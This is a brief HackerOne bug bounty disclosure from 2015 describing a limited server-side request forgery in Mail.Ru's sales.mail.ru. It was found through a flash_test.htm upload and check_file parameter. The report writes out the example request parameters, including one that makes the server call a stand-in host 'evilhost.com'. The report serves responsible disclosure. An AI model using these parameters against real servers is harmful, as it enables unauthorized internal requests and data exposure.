Mail.Ru: Potential SSRF in sales.mail.ru

2015-11-03T09:03:23
ID H1:97395
Type hackerone
Reporter paresh_parmar
Modified 2017-03-27T13:14:03

Description

SSRF in the project outside of bug bounty program's scope. Despite the project is out-of-scope, bounty was rewarded due to problem severity. i reported this issue as xss one year ago, so i found a directory, where one can upload /flash_test.htm?show=upload swf files, i uploaded malicious swf file with xss payload. swf file was uploading in 3rd party domain so was executing there. flash_test.htm?check_file=xss.swf|https://sandboxdomain.com/img/7D/E83D61.swf but its was executing in 3rd party domain so team closed my report as N/A . that time i forgot to check more , 3 months ago i decided to investigate more and found SSRF here. flash_test.htm?check_file=xss.swf|http://evilhost.com/ssrf and response received into my console. it was limited ssrf.